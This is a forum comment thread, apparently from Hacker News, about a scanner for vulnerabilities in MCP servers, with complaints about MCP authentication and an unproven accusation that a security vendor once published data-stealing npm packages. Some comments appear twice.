I have seen a bunch of demos of this, often building on top of open standards like the SAFE-MCP MITRE ATT&CK analysis https://github.com/SAFE-MCP/safe-mcp
In general, the only way to make sure MCPs are safe is to limit which connections are made in an enterprise setting
The MCP landscape is a huge frothing septic tank. Go on, try to create a simple MCP server that is protected by a password and connect it to ChatGPT or Claude. Or even the one that uses your local SSO system for authentication.
I tried and failed after about 3 days of dealing with AI-slop-generated nonsense that has _never_ been worked. The MCP spec was created probably by brainless AI agents, so it defines two authentication methods: no authentication whatsoever, and OAuth that requires bleeding-edge features (dynamic client registration) not implemented by Google or Microsoft.
The easiest way for that right now is to ask users to download a random NodeJS package that runs locally on their machines with minimal confinement.
Is this to scan your own MCP servers? Does using someone else's MCP server put you at risk?
I didn't even know want an MCP server was until I noticed the annoying category in VSCode Extensions panel today. Only able to get rid of it by turning off a broad AI related flag in settings (fine by me, wish I knew it was there earlier). An hour later, I'm seeing this.
At Snyk, we've been working on this for a while. Here's our flagship open source project consolidating a lot of the MCP risk factors we've discovered over the last year or so into actionable info: https://github.com/invariantlabs-ai/mcp-scan
This org has gone to some dubious lengths to make a name for themselves, including submitting backdoored packages to public npm repos which would exfiltrate your data and send to a Synk-controlled C&C. This included the environment, which would be sending them your username along with any envvars like git/aws/etc auth tokens.
This might give them some credibility in this space, maybe they stand a decent chance of scanning MCPs for backdoors based on their own experience in placing malicious code on other people's systems.
MCP-Scanner – Scan MCP Servers for vulnerabilities
(github.com)168 points by hsanthan 27 October 2025 | 50 comments
Comments
In general, the only way to make sure MCPs are safe is to limit which connections are made in an enterprise setting
I tried and failed after about 3 days of dealing with AI-slop-generated nonsense that has _never_ been worked. The MCP spec was created probably by brainless AI agents, so it defines two authentication methods: no authentication whatsoever, and OAuth that requires bleeding-edge features (dynamic client registration) not implemented by Google or Microsoft.
The easiest way for that right now is to ask users to download a random NodeJS package that runs locally on their machines with minimal confinement.
I didn't even know want an MCP server was until I noticed the annoying category in VSCode Extensions panel today. Only able to get rid of it by turning off a broad AI related flag in settings (fine by me, wish I knew it was there earlier). An hour later, I'm seeing this.
This org has gone to some dubious lengths to make a name for themselves, including submitting backdoored packages to public npm repos which would exfiltrate your data and send to a Synk-controlled C&C. This included the environment, which would be sending them your username along with any envvars like git/aws/etc auth tokens.
This might give them some credibility in this space, maybe they stand a decent chance of scanning MCPs for backdoors based on their own experience in placing malicious code on other people's systems.